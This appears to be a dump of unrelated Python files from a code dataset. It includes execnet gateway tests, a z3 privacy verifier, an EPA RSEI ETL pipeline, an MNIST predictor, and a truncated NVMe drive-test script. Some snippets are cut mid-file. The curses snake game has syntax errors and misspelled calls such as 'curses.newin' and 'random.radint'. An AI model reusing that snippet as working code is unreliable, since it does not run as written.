send_source = gateway._source_of_function(working)
expected = 'def working(channel):\n pass\n'
assert send_source == expected
class TestGlobalFinder(object):
def check(self, func):
src = py.code.Source(func)
code = py.code.Code(func)
return gateway._find_non_builtin_globals(str(src), code.raw)
def test_local(self):
def f(a, b, c):
d = 3
return d
assert self.check(f) == []
def test_global(self):
def f(a, b):
sys
d = 4
return d
assert self.check(f) == ['sys']
def test_builtin(self):
def f():
len
assert self.check(f) == []
def test_function_with_global_fails(self):
def func(channel):
sys
pytest.raises(ValueError, gateway._source_of_function, func)
def test_method_call(self):
# method names are reason
# for the simple code object based heusteric failing
def f(channel):
channel.send(dict(testing=2))
assert self.check(f) == []
@skip_win_pypy
def test_remote_exec_function_with_kwargs(anypython, makegateway):
def func(channel, data):
channel.send(data)
gw = makegateway('popen//python=%s' % anypython)
print ("local version_info {!r}".format(sys.version_info))
print ("remote info: {}".format(gw._rinfo()))
ch = gw.remote_exec(func, data=1)
result = ch.receive()
assert result == 1
def test_remote_exc__no_kwargs(makegateway):
gw = makegateway()
with pytest.raises(TypeError):
gw.remote_exec(gateway_base, kwarg=1)
with pytest.raises(TypeError):
gw.remote_exec('pass', kwarg=1)
@skip_win_pypy
def test_remote_exec_inspect_stack(makegateway):
gw = makegateway()
ch = gw.remote_exec("""
import inspect
inspect.stack()
import traceback
channel.send('\\n'.join(traceback.format_stack()))
""")
assert 'File "<remote exec>"' in ch.receive()
ch.waitclose()
|
StarcoderdataPython
|
6469196
|
<gh_stars>1-10
import ast
import _ast
import re
from lightdp.typing import *
import z3
_cmpop_map = {
ast.Eq: lambda x, y: x == y,
ast.Not: lambda x: z3.Not(x),
ast.Gt: lambda x, y: x > y,
ast.Lt: lambda x, y: x < y,
ast.LtE: lambda x, y: x <= y,
ast.GtE: lambda x, y: x >= y
}
_binop_map = {
ast.Add: lambda x, y: x + y,
ast.Sub: lambda x, y: x - y,
ast.Mult: lambda x, y: x * y,
ast.Div: lambda x, y: x / y
}
_boolop_map = {
ast.And: lambda x, y: z3.And(x, y),
ast.Or: lambda x, y: z3.Or(x, y)
}
_unop_map = {
ast.USub: lambda x: -x
}
class NodeVerifier(ast.NodeVisitor):
"""
Walks through the :py:class:`ast.AST` and generate constraints to be solved by z3.
"""
def __init__(self):
"""
Initialization of :py:class:`NodeVerifier`.
"""
self._precondition = []
self._declarations = []
self._if_checks = []
self._assign_checks = []
self._type_map = None
def get_constraint(self):
return z3.And(z3.And(self._precondition), z3.And(self._declarations),
z3.Not(z3.And(z3.And(self._if_checks), z3.And(self._assign_checks))))
def _symbol(self, name):
lightdp_type = self._type_map[name]
if isinstance(lightdp_type, NumType):
return z3.Real(name)
elif isinstance(lightdp_type, ListType):
if isinstance(lightdp_type.elem_type, NumType):
return z3.Array(name, z3.RealSort(), z3.RealSort())
elif isinstance(lightdp_type.elem_type, BoolType):
return z3.Array(name, z3.BoolSort(), z3.RealSort())
else:
raise ValueError('Unsupported list inside list.')
elif isinstance(lightdp_type, FunctionType):
raise NotImplementedError('Function type is currently not supported.')
elif isinstance(lightdp_type, BoolType):
return z3.Bool(name)
else:
assert False, 'No such type %s' % lightdp_type
@staticmethod
def parse_docstring(s):
assert s is not None
from .lexer import build_lexer
from .parser import build_parser
lexer = build_lexer()
parser = build_parser()
return parser.parse(s, lexer=lexer)
@staticmethod
def parse_expr(expr):
node = ast.parse(expr)
assert isinstance(node, ast.Module) and isinstance(node.body[0], ast.Expr), \
r"""expr_parse fed with illegal expression string '%s'""" % expr
return node.body[0].value
def visit_FunctionDef(self, node):
annotation = NodeVerifier.parse_docstring(ast.get_docstring(node))
if annotation is not None:
forall_vars, precondition, self._type_map = annotation
# set the distance vars for the corresponding normal vars
from collections import OrderedDict
for name, var_type in OrderedDict(self._type_map).items():
constraint = None
if isinstance(var_type, NumType):
self._type_map['^' + name] = NumType(0)
if var_type.value != '*':
# TODO: distance variables should be simpler
distance_vars = re.findall(r"""\^([_a-zA-Z][0-9a-zA-Z_]*)""", var_type.value)
constraint = self._symbol('^' + name) == \
self.visit(self.parse_expr(var_type.value.replace('^', '')))[0]
for distance_var in distance_vars:
constraint = z3.substitute(constraint,
(self._symbol(distance_var), self._symbol('^' + distance_var)))
elif isinstance(var_type, BoolType):
self._type_map['^' + name] = NumType(0)
constraint = self._symbol('^' + name) == \
self.visit(self.parse_expr('0'))[0]
elif isinstance(var_type, FunctionType):
# TODO: consider FunctionType
pass
elif isinstance(var_type, ListType):
# TODO: consider list inside list
self._type_map['^' + name] = ListType(NumType(0))
symbol_i = self._symbol('i')
if isinstance(var_type.elem_type, NumType) and var_type.elem_type.value != '*':
constraint = self._symbol('^' + name)[symbol_i] == \
self.visit(self.parse_expr(var_type.elem_type.value))[0]
elif isinstance(var_type.elem_type, BoolType):
constraint = self._symbol('^' + name)[symbol_i] == \
self.visit(self.parse_expr('0'))[0]
if constraint is not None:
self._declarations.append(constraint)
# parse the precondition to constraint
distance_vars = re.findall(r"""\^([_a-zA-Z][0-9a-zA-Z_]*)""", precondition)
pre_constraint = self.visit(self.parse_expr(precondition.replace('^', '')))[0]
for distance_var in distance_vars:
pre_constraint = z3.substitute(pre_constraint,
(self._symbol(distance_var), self._symbol('^' + distance_var)))
if forall_vars is not None:
pre_constraint = z3.ForAll([self._symbol(var) for var in forall_vars], pre_constraint)
del self._precondition[:]
self._precondition.append(pre_constraint)
# empty the check list
del self._if_checks[:]
del self._assign_checks[:]
self.generic_visit(node)
def visit_If(self, node):
test_node = self.visit(node.test)
self._if_checks.append(test_node[0] == test_node[1])
self.generic_visit(node)
def visit_IfExp(self, node):
test_node = self.visit(node.test)
self._if_checks.append(test_node[0] == test_node[1])
return z3.If(test_node[0], self.visit(node.body)[0], self.visit(node.orelse)[0]), \
z3.If(test_node[1], self.visit(node.body)[1], self.visit(node.orelse)[1])
def visit_Compare(self, node):
assert len(node.ops) == 1 and len(node.comparators), 'Only allow one comparators in binary operations.'
left_expr = self.visit(node.left)
right_expr = self.visit(node.comparators[0])
return (_cmpop_map[node.ops[0].__class__](left_expr[0], right_expr[0]),
_cmpop_map[node.ops[0].__class__](left_expr[0] + left_expr[1], right_expr[0] + right_expr[1]))
def visit_Name(self, node):
assert node.id in self._type_map, 'Undefined %s' % node.id
return self._symbol(node.id), self._symbol('^' + node.id)
def visit_Num(self, node):
return node.n, 0
def visit_BinOp(self, node):
assert isinstance(node.op, tuple(_binop_map.keys())), 'Unsupported BinOp %s' % ast.dump(node.op)
return (_binop_map[node.op.__class__](self.visit(node.left)[0], self.visit(node.right)[0]),
_binop_map[node.op.__class__](self.visit(node.left)[1], self.visit(node.right)[1]))
def visit_Subscript(self, node):
assert isinstance(node.slice, ast.Index), 'Only index is supported.'
return (self.visit(node.value)[0][self.visit(node.slice.value)[0]],
self.visit(node.value)[1][self.visit(node.slice.value)[0]])
def visit_BoolOp(self, node):
assert isinstance(node.op, tuple(_boolop_map.keys())), 'Unsupported BoolOp %s' % ast.dump(node.op)
from functools import reduce
return (reduce(_boolop_map[node.op.__class__], [self.visit(value)[0] for value in node.values]),
reduce(_boolop_map[node.op.__class__], [self.visit(value)[1] for value in node.values]))
def visit_UnaryOp(self, node):
assert isinstance(node.op, tuple(_unop_map.keys())), 'Unsupported UnaryOp %s' % ast.dump(node.op)
return (_unop_map[node.op.__class__](self.visit(node.operand)[0]),
_unop_map[node.op.__class__](self.visit(node.operand)[1]))
def visit_Assign(self, node):
if isinstance(node.value, ast.Call) and node.value.func.id == 'Laplace':
pass
elif len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
target_type = self._type_map[node.targets[0].id]
if isinstance(target_type, ListType):
# TODO: list assignment
pass
# raise NotImplementedError('List assignment not implemented.')
else:
self._assign_checks.append(self.visit(node.targets[0])[1] == self.visit(node.value)[1])
else:
raise NotImplementedError('Currently don\'t support multiple assignment.')
def visit_NameConstant(self, node):
assert node.value is True or node.value is False, 'Unsupported NameConstant %s' % str(node.value)
return node.value, NumType(0)
def visit_Call(self, node):
if isinstance(node.func, ast.Attribute) and node.func.attr == 'append':
# type check
assert isinstance(self._type_map[node.func.value.id], ListType), \
'%s is not typed as list.' % node.func.value.id
if isinstance(self._type_map[node.func.value.id].elem_type, NumType):
self._declarations.append(self.visit(node.func.value.id)[1][self._symbol('i')] ==
self.visit(node.args[0])[1])
else:
# TODO: check the function return type.
pass
def verify(tree):
"""
Verify the :py:class:`ast.AST` and returns the satisfiability.
:param tree: The original :py:class:`ast.AST` node.
:return: True if the constraints are satisfied otherwise False.
"""
assert isinstance(tree, _ast.AST)
for node in ast.walk(tree):
if isinstance(node, ast.FunctionDef):
# TODO: consider multiple functions scenario
verifier = NodeVerifier()
verifier.visit(node)
s = z3.Solver()
s.add(verifier.get_constraint())
return (True if s.check() == z3.sat else False), str(verifier.get_constraint())
|
StarcoderdataPython
|
4922124
|
<gh_stars>0
from python_framework import Controller, ControllerMethod, HttpStatus
@Controller(url='/actuator/health', tag='HealthCheck', description='HealthCheck controller')
class ActuatorHealthController:
@ControllerMethod()
def get(self):
return {'status' : 'UP'}, HttpStatus.OK
@Controller(url='/', tag='HealthCheck', description='HealthCheck controller')
class ActuatorHealthBatchController:
@ControllerMethod()
def get(self):
return {'status' : 'UP'}, HttpStatus.OK
|
StarcoderdataPython
|
11395298
|
<filename>aoc2021/day_05.py
"""
This problem can be solved in many ways. The optimal one AFAIK is using
Bentley–Ottmann algorithm (O((n + k)log(n))). Unfortunately, I'm unable
to implement it (yet).
"""
from __future__ import annotations
from typing import NamedTuple, Generator
from collections import Counter
class Point(NamedTuple):
x: int
y: int
@classmethod
def parse(cls, point_text: str) -> Point:
return cls(*map(int, point_text.split(",")))
class Line(NamedTuple):
start: Point
end: Point
@property
def is_horizontal(self) -> bool:
return self.start.y == self.end.y
@property
def is_vertical(self) -> bool:
return self.start.x == self.end.x
@property
def is_diagonal(self) -> bool:
return not (self.is_horizontal or self.is_vertical)
def __iter__(self) -> Generator[Point, None, None]:
if self.is_diagonal:
d_x, d_y = ((1, 1), (1, -1))[self.start.y > self.end.y]
else:
d_x, d_y = ((0, 1), (1, 0))[self.is_horizontal]
current_point = self.start
while current_point != self.end:
yield current_point
current_point = Point(current_point.x + d_x, current_point.y + d_y)
yield current_point
@classmethod
def parse(cls, line_text: str) -> Line:
start, end = line_text.split(" -> ")
start_point = Point.parse(start)
end_point = Point.parse(end)
if start_point > end_point:
start_point, end_point = end_point, start_point
return cls(start_point, end_point)
def parse_lines(lines_text: str) -> list[Line]:
return [Line.parse(l) for l in lines_text.split("\n")]
def count_intersections(lines: Generator[Line, None, None]) -> int:
counter: dict[Point, int] = Counter()
for line in lines:
for point in line:
counter[point] += 1
return sum(v > 1 for v in counter.values())
def first_task(lines_text: str) -> int:
lines = parse_lines(lines_text)
return count_intersections(line for line in lines if not line.is_diagonal)
def second_task(lines_text: str) -> int:
lines = parse_lines(lines_text)
return count_intersections(line for line in lines)
|
StarcoderdataPython
|
8031281
|
<reponame>duanguanhua/python_practice
print("hello world")
age = 18
print("age变量里的值是%d" % age)
name = "东哥"
print("名字是:%s" % name)
|
StarcoderdataPython
|
8125236
|
# Copyright (c) 2020. <NAME>
import enum
class Move(enum.Enum):
"""
Enumerations of Moves allowed for the Bloxorz Block in the game
Allowed moves are Left, Right, Up, Down
"""
Left = 1
Right = 2
Up = 3
Down = 4
|
StarcoderdataPython
|
4975445
|
import random
import _curses, curses
s=curses.initscr()
curses.curs_set(0)
sh,sw=s.getmaxyx()
w=curses.newin(sh,sw,0,0)
w.keypad(1)
w.timeout(100)
snk_x=sw/4
snk_y=sh/2
snake=[
[snk_y,snk_x]
[snk_y,snk_x-1]
[snk_y,snk_x-2]
]
food=[sh/2,sw/2]
w.addch(food[0],food[1],curses.ACS_PI)
key=curses.KEY_RIGHT
while True:
next_key=w.getch()
key=key if next_key==-1 else next_key
if snake[0][0] in [0,sh] or snake[0][sw] or snake[0] in snake[1:]:
curses.endwin()
quit()
new_head=[snake[0][0],snake[0][1]]
if key==curses.KEY_DOWN:
new_head[0]+=1
if key==curses.KEY_UP:
new_head[0]-=1
if key==curses.KEY_LEFT:
new_head[1]+=1
if key==curses.KEY_RIGHT:
new_head[1]-=1
snake.insert(0,new_head)
if snake[0]==food:
food=None
while food in None:
nf=[
random.radint(1,sh-1),
random.randint(1,sw-1)
]
food=nf if nf not in snake else None
w.addch(food[0],food[1],curses.ACS_PI)
else:
tail=snake.pop()
w.addch(tail[0],tail[1], ' ')
w.addch(snake[0][0],snake[0][1],curses.ACS_CKBOARD)
|
StarcoderdataPython
|
198369
|
# Copyright (c) 2013 CEF Python, see the Authors file.
# All rights reserved. Licensed under BSD 3-clause license.
# Project website: https://github.com/cztomczak/cefpython
# NOTE: Template variables like {{VERSION}} are replaced with actual
# values when make_installer.py tool generates this package
# installer.
import os
import sys
import ctypes
import platform
__all__ = ["cefpython"] # Disabled: "wx"
__version__ = "{{VERSION}}"
__author__ = "The CEF Python authors"
# If package was installed using PIP or setup.py then package
# dir is here:
# /usr/local/lib/python2.7/dist-packages/cefpython3/
# If this is a debian package then package_dir returns:
# /usr/lib/pymodules/python2.7/cefpython3
# The above path consists of symbolic links to the real directory:
# /usr/share/pyshared/cefpython3
package_dir = os.path.dirname(os.path.abspath(__file__))
# This loads the libcef.so library for the subprocess executable.
# On Mac it works without setting library paths.
os.environ["LD_LIBRARY_PATH"] = package_dir
# This env variable will be returned by cefpython.GetModuleDirectory().
os.environ["CEFPYTHON3_PATH"] = package_dir
# This loads the libcef library for the main python executable.
# Loading library dynamically using ctypes.CDLL is required on Linux.
# TODO: Check if on Linux libcef.so can be linked like on Mac.
# On Mac the CEF framework dependency information is added to
# the cefpython*.so module by linking to CEF framework.
# The libffmpegsumo.so library does not need to be loaded here,
# it may cause issues to load it here in the browser process.
if platform.system() == "Linux":
libcef = os.path.join(package_dir, "libcef.so")
ctypes.CDLL(libcef, ctypes.RTLD_GLOBAL)
# Load the cefpython module for given Python version
if sys.version_info[:2] == (2, 7):
# noinspection PyUnresolvedReferences
from . import cefpython_py27 as cefpython
elif sys.version_info[:2] == (3, 4):
# noinspection PyUnresolvedReferences
from . import cefpython_py34 as cefpython
elif sys.version_info[:2] == (3, 5):
# noinspection PyUnresolvedReferences
from . import cefpython_py35 as cefpython
elif sys.version_info[:2] == (3, 6):
# noinspection PyUnresolvedReferences
from . import cefpython_py36 as cefpython
elif sys.version_info[:2] == (3, 7):
# noinspection PyUnresolvedReferences
from . import cefpython_py37 as cefpython
else:
raise Exception("Python version not supported: " + sys.version)
|
StarcoderdataPython
|
5082021
|
def factorial(n):
'''returns n!'''
return 1 if n < 2 else n * factorial(n-1)
print(factorial(12))
print(factorial.__doc__)
print(type(factorial))
fact = factorial
print(fact(12))
# 高阶函数,返回函数的函数
l = ['jfis','apple','cherry','raspberry','banana']
print(sorted(l, key=len))
def reverse(word):
return word[::-1]
print(sorted(l, key= reverse))
# map reduce
print(list(map(fact, range(6))))
# 生成表达式更加直观
print([fact(n) for n in range(6)])
print(list(map(fact, filter(lambda n: n%2, range(6)))))
# 生成表达式同样更加直观
print([fact(n) for n in range(6) if n%2])
from functools import reduce
from operator import add
print(reduce(add, range(100)))
print(sum(range(100)))
# 函数内省
print(dir(factorial))
class C: pass
obj = C()
def func(): pass
print(sorted(set(dir(func)) - set(dir(obj))))
print(func.__code__)
|
StarcoderdataPython
|
8098916
|
import tensorflow as tf
import cv2
import mnist
import numpy as np
def pred(filename, train_dir):
img = cv2.imread(filename, flags=cv2.IMREAD_GRAYSCALE)
img = tf.cast(img, tf.float32)
img = tf.reshape(img, [-1, 28, 28, 1])
logits, predict = mnist.inference(img, training=False)
saver = tf.train.Saver()
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(train_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
else:
print('no checkpoint file')
return
pre = sess.run(predict)
print('model:{}, file:{}, label: {} ({:.2f}%)'.
format(ckpt.model_checkpoint_path, filename, np.argmax(pre[0]), np.max(pre[0]) * 100))
if __name__ == '__main__':
pred('./img_test/2_2098.jpg', './train')
|
StarcoderdataPython
|
1884446
|
from pathlib import Path
import pandas as pd
from data_pipeline.etl.base import ExtractTransformLoad
from data_pipeline.score import field_names
from data_pipeline.utils import get_module_logger, unzip_file_from_url
logger = get_module_logger(__name__)
class EPARiskScreeningEnvironmentalIndicatorsETL(ExtractTransformLoad):
"""Class for 2019 Census Tract RSEI Aggregated micro-data
Data source overview: Page 20 in this document:
https://www.epa.gov/sites/default/files/2017-01/documents/rsei-documentation-geographic-microdata-v235.pdf
Disaggregated and aggregated datasets for 2019 is documented here:
https://github.com/usds/justice40-tool/issues/1070#issuecomment-1005604014
"""
def __init__(self):
self.AGGREGATED_RSEI_SCORE_FILE_URL = "http://abt-rsei.s3.amazonaws.com/microdata2019/census_agg/CensusMicroTracts2019_2019_aggregated.zip"
self.OUTPUT_PATH: Path = (
self.DATA_PATH / "dataset" / "epa_rsei_aggregated"
)
self.EPA_RSEI_SCORE_THRESHOLD_CUTOFF = 0.75
self.TRACT_INPUT_COLUMN_NAME = "GEOID10"
self.NUMBER_FACILITIES_INPUT_FIELD = "NUMFACS"
self.NUMBER_RELEASES_INPUT_FIELD = "NUMRELEASES"
self.NUMBER_CHEMICALS_INPUT_FIELD = "NUMCHEMS"
self.AVERAGE_TOXICITY_INPUT_FIELD = "TOXCONC"
self.SCORE_INPUT_FIELD = "SCORE"
self.POPULATION_INPUT_FIELD = "POP"
self.CSCORE_INPUT_FIELD = "CSCORE"
self.NCSCORE_INPUT_FIELD = "NSCORE"
# References to the columns that will be output
self.COLUMNS_TO_KEEP = [
self.GEOID_TRACT_FIELD_NAME,
field_names.EPA_RSEI_NUMBER_FACILITIES_FIELD,
field_names.EPA_RSEI_NUMBER_RELEASES_FIELD,
field_names.EPA_RSEI_NUMBER_CHEMICALS_FIELD,
field_names.EPA_RSEI_AVERAGE_TOXICITY_FIELD,
field_names.EPA_RSEI_SCORE_FIELD,
field_names.EPA_RSEI_CSCORE_FIELD,
field_names.EPA_RSEI_NCSCORE_FIELD,
field_names.EPA_RSEI_POPULATION_FIELD,
field_names.EPA_RSEI_SCORE_THRESHOLD_FIELD,
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX,
]
self.df: pd.DataFrame
def extract(self) -> None:
logger.info("Starting 2.5 MB data download.")
# the column headers from the above dataset are actually a census tract's data at this point
# We will use this data structure later to specify the column names
input_columns = [
self.TRACT_INPUT_COLUMN_NAME,
self.NUMBER_FACILITIES_INPUT_FIELD,
self.NUMBER_RELEASES_INPUT_FIELD,
self.NUMBER_CHEMICALS_INPUT_FIELD,
self.AVERAGE_TOXICITY_INPUT_FIELD,
self.SCORE_INPUT_FIELD,
self.POPULATION_INPUT_FIELD,
self.CSCORE_INPUT_FIELD,
self.NCSCORE_INPUT_FIELD,
]
unzip_file_from_url(
file_url=self.AGGREGATED_RSEI_SCORE_FILE_URL,
download_path=self.TMP_PATH,
unzipped_file_path=self.TMP_PATH / "epa_rsei_aggregated",
)
self.df = pd.read_csv(
filepath_or_buffer=self.TMP_PATH
/ "epa_rsei_aggregated"
/ "CensusMicroTracts2019_2019_aggregated.csv",
# The following need to remain as strings for all of their digits, not get
# converted to numbers.
low_memory=False,
names=input_columns,
)
def transform(self) -> None:
logger.info("Starting transforms.")
score_columns = [x for x in self.df.columns if "SCORE" in x]
# coerce dataframe type to perform correct next steps
self.df[score_columns] = self.df[score_columns].astype(float)
self.df.rename(
columns={
self.TRACT_INPUT_COLUMN_NAME: self.GEOID_TRACT_FIELD_NAME,
self.NUMBER_FACILITIES_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_FACILITIES_FIELD,
self.NUMBER_RELEASES_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_RELEASES_FIELD,
self.NUMBER_CHEMICALS_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_CHEMICALS_FIELD,
self.AVERAGE_TOXICITY_INPUT_FIELD: field_names.EPA_RSEI_AVERAGE_TOXICITY_FIELD,
self.SCORE_INPUT_FIELD: field_names.EPA_RSEI_SCORE_FIELD,
self.CSCORE_INPUT_FIELD: field_names.EPA_RSEI_CSCORE_FIELD,
self.NCSCORE_INPUT_FIELD: field_names.EPA_RSEI_NCSCORE_FIELD,
self.POPULATION_INPUT_FIELD: field_names.EPA_RSEI_POPULATION_FIELD,
},
inplace=True,
)
# Please note this: https://www.epa.gov/rsei/understanding-rsei-results#what
# Section: "What does a high RSEI Score mean?"
# This was created for the sole purpose to be used in the current
# iteration of Score L
self.df[
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX
] = self.df[field_names.EPA_RSEI_SCORE_FIELD].rank(
ascending=True,
pct=True,
)
# This threshold was arbitrarily chosen.
# It would make sense to enrich this with facilities, industries, or chemical
# that would enable some additional form of sub-stratification when examining
# different percentile ranges that are derived above.
self.df[field_names.EPA_RSEI_SCORE_THRESHOLD_FIELD] = (
self.df[
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX
]
>= self.EPA_RSEI_SCORE_THRESHOLD_CUTOFF
)
expected_census_tract_field_length = 11
self.df[self.GEOID_TRACT_FIELD_NAME] = (
self.df[self.GEOID_TRACT_FIELD_NAME]
.astype(str)
.apply(lambda x: x.zfill(expected_census_tract_field_length))
)
if len(self.df[self.GEOID_TRACT_FIELD_NAME].str.len().unique()) != 1:
raise ValueError(
f"GEOID Tract must be length of {expected_census_tract_field_length}"
)
def validate(self) -> None:
logger.info("Validating data.")
pass
def load(self) -> None:
logger.info("Saving CSV")
self.OUTPUT_PATH.mkdir(parents=True, exist_ok=True)
self.df[self.COLUMNS_TO_KEEP].to_csv(
path_or_buf=self.OUTPUT_PATH / "usa.csv", index=False
)
|
StarcoderdataPython
|
12812043
|
#--------------------------------------------------------------------------------------------------------------------
# Example python script that runs a few functional tests on NVMe drives. Goal is to demonstrate how to use nvmecmd
# and fio to define custom NVMe tests. This is an example only and is not a comprehensive set of tests.
#
# For new drives use the --new switch to check the drive against new-drive.rules.json
# To use custom cmd and/or rules use --path to specify directory with cmd and rules subdirectories
#--------------------------------------------------------------------------------------------------------------------
# Copyright(c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this softwareand associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and /or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#--------------------------------------------------------------------------------------------------------------------
import sys,os, argparse, time, logging, csv
from test import *
from datetime import datetime
#--------------------------------------------------------------------------------------------------------------------
# Read the command line parameters using argparse
#--------------------------------------------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Runs functional tests on NVMe drive', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--nvme', type=int, default=0, help='NVMe drive number', metavar='#')
parser.add_argument('--volume', type=str, default=DEFAULT_VOLUME, help='Volume to run fio (e.g. c:)', metavar='<dir>')
parser.add_argument('--dir', type=str, default='', help='Directory to log results', metavar='<dir>')
parser.add_argument('--path', type=str, default=NVMECMD_RESOURCES, help='Path to directory with cmd and rules subdirectories', metavar='<dir>')
parser.add_argument('--new', default=False, action=argparse.BooleanOptionalAction, help="Checks new-drives rules")
parser.add_argument('--tests', type=int, nargs="+", default=[1,2,3,4,5,6,7,8,9], help="List of tests to run (e.g. 1 4 5 6)")
args = parser.parse_args()
if os.path.dirname(args.volume) != args.volume:
print(f"Volume {args.volume} is not a legal volume. Windows example: c:")
os._exit(1)
if args.dir == "":
args.dir = os.path.join(os.path.abspath('.'), 'checkout', datetime.now().strftime("%Y%m%d_%H%M%S"))
#--------------------------------------------------------------------------------------------------------------------
# Setup the logging
#--------------------------------------------------------------------------------------------------------------------
try:
os.makedirs(args.dir)
except FileExistsError:
pass
except:
logger.error(f">>>> FATAL ERROR: Failed to make directory {args.dir}")
os._exit(1)
logger = logging.getLogger('nvme_logger')
fileHandler = logging.FileHandler(os.path.join(args.dir,'checkout.log'))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
#--------------------------------------------------------------------------------------------------------------------
# Setup vars
#--------------------------------------------------------------------------------------------------------------------
cmd_directory = os.path.join(args.path) # User specifies location for this
rules_directory = os.path.join(args.path) # User specifies location for this
script_errors = 0 # Track script errors here for return value
step = {}
idle_times_ms = [0,20,50,70,90,150,200,500,700,900,1000,1200,1500 ]
#--------------------------------------------------------------------------------------------------------------------
# Start testing...
#--------------------------------------------------------------------------------------------------------------------
try:
#################################################################################################################
# Test - Verify new-drive and feature rules
#################################################################################################################
if 1 in args.tests or 9 in args.tests:
test = start_test(1,"Nvme-Verify-Info",args.dir)
#-------------------------------------------------------------------
# Step 1: Read info and verify against customer features
#-------------------------------------------------------------------
step = start_step("Verify-Features-And-Errors",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'user-features.rules.json') # use rules file from the specified path
ref_info_file = os.path.join(working_directory,"nvme.info.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify features rules
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory) # run nvmecmd in directory created by start_step
log_report(ref_info_file,args.nvme,False) # Display the report on the NVMe drive being tested
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Step 2: If --new specified verify info against new-drive rules
#-------------------------------------------------------------------
if args.new:
step = start_step("Verify-New-Drive-Rules",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'unused-drive.rules.json') # use rules file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify new drive rules
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory) # run process in directory created by start_step
test['errors'] += end_step(step)
script_errors += end_test(test)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if script_errors:
os._exit(test['errors'])
#################################################################################################################
# Test - Run Self-Tests
#################################################################################################################
if 2 in args.tests:
test = start_test(2,"Nvme-Self-Tests",args.dir)
#-------------------------------------------------------------------
# Step 1: Run short self-test
#-------------------------------------------------------------------
step = start_step("Short-Self-Test",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'self-test.cmd.json') # use cmd file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to run the short self-test
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
if ("Windows" == platform.system()):
logger.info("\t\tWaiting 10 minutes for Windows workaround")
logger.info("")
time.sleep(600)
#-------------------------------------------------------------------
# Step 2: Run extended self-test
#-------------------------------------------------------------------
step = start_step("Extended-Self-Test",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'self-test.cmd.json') # use cmd file from the specified path
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to run the extended self-test
"--dir",f"{working_directory}", # log to the directory created by start_step
"--extended", # run the extended self-test
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
script_errors += end_test(test)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if script_errors:
os._exit(test['errors'])
#################################################################################################################
# Test - Check admin command reliability
#################################################################################################################
if 3 in args.tests:
test = start_test(3,"Command-Reliability",args.dir)
#-------------------------------------------------------------------
# Step 1: Read info, verify against customer features, and compare
#-------------------------------------------------------------------
step = start_step("Read-Verify-Compare-1K",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
rules_file = os.path.join(rules_directory,'user-features.rules.json') # use rules file from the specified path
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--rules",f"{rules_file}", # Verify features rules
"--samples","1000", # set number of samples to read
"--interval","500", # set interval in mS
